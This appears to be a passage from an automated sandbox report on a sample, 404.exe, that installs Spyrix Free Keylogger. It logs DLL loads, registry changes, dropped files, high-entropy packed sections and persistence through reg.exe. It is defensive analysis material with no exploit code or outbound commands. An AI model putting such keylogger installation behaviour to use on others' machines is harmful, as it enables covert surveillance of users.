Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH

Source: Spyrix Free Keylogger.lnk.13.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.13.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.13.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Window found: window name: TSelectLanguageForm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Automated click: I accept the agreement
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\404.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 404.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 404.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 404.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 404.exe

Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]

Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name:
Source: is-A63B5.tmp.13.dr	Static PE information: section name: .d
Source: is-A63B5.tmp.13.dr	Static PE information: section name: .adata
Source: is-KK513.tmp.13.dr	Static PE information: section name: .rodata
Source: is-KK513.tmp.13.dr	Static PE information: section name: .rotext
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name:
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: .adata
Source: is-BG5BA.tmp.13.dr	Static PE information: section name: .didata
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /4
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /19
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /31
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /45
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /57
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /70
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /81
Source: is-DN3K6.tmp.13.dr	Static PE information: section name: /92
Source: ffws.exe.51.dr	Static PE information: section name: .rodata
Source: ffws.exe.51.dr	Static PE information: section name: .rotext

Source: C:\Users\user\Desktop\404.exe	Code function: 0_2_083EFDD8 push esp; retf	0_2_083EFDD9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_007B16A4 push 007B17DEh; ret	51_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_008650DC push 00865161h; ret	51_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00865B30 push 00865BB6h; ret	51_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086DEA3 push cs; ret	51_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_008660D4 push 0086613Ch; ret	51_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086D2D4 push cs; iretd	51_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00872002 push 00000075h; retf	51_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00874401 push ecx; ret	51_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00869C0D push eax; ret	51_2_00869C8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086524C push 008652D7h; ret	51_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086D586 push ebx; ret	51_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00865188 push 00865230h; ret	51_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_008675AC push 008675D9h; ret	51_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_0086D3D6 push cs; iretd	51_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00865DFC push 00865E74h; ret	51_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_00867550 push 0086759Ah; ret	51_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033FE001 push eax; ret	51_2_033FE108
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033FE001 push 033E4EC0h; ret	51_2_033FE5D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033DD398 push 033DD3C4h; ret	51_2_033DD3BC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D73F8 push 033D7424h; ret	51_2_033D741C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033E03E4 push 033E0410h; ret	51_2_033E0408
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033C5238 push 033C5264h; ret	51_2_033C525C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D5224 push 033D5266h; ret	51_2_033D525E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033C5200 push 033C522Ch; ret	51_2_033C5224
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D52A8 push 033D52D4h; ret	51_2_033D52CC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D52E0 push 033D530Ch; ret	51_2_033D5304
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033D011C push 033D0154h; ret	51_2_033D014C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033CE108 push 033CE134h; ret	51_2_033CE12C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033C5144 push 033C517Ch; ret	51_2_033C5174
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 51_2_033CD1A8 push 033CD1F4h; ret	51_2_033CD1EC

Source: 404.exe	Static PE information: section name: .text entropy: 7.81759162350406
Source: is-A63B5.tmp.13.dr	Static PE information: section name: entropy: 7.970560832581065
Source: is-A63B5.tmp.13.dr	Static PE information: section name: entropy: 7.995359849273399
Source: is-A63B5.tmp.13.dr	Static PE information: section name: entropy: 7.98989686324796
Source: is-A63B5.tmp.13.dr	Static PE information: section name: entropy: 7.581553890924904
Source: is-A63B5.tmp.13.dr	Static PE information: section name: entropy: 7.998441689187187
Source: is-A63B5.tmp.13.dr	Static PE information: section name: .d entropy: 7.923610064617086
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: entropy: 7.972249623981622
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: entropy: 7.99458999281375
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: entropy: 7.992015849394924
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: entropy: 7.515192733866904
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: entropy: 7.998936896615619
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-F1LPA.tmp.13.dr	Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-F1LPA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dll	Jump to dropped file
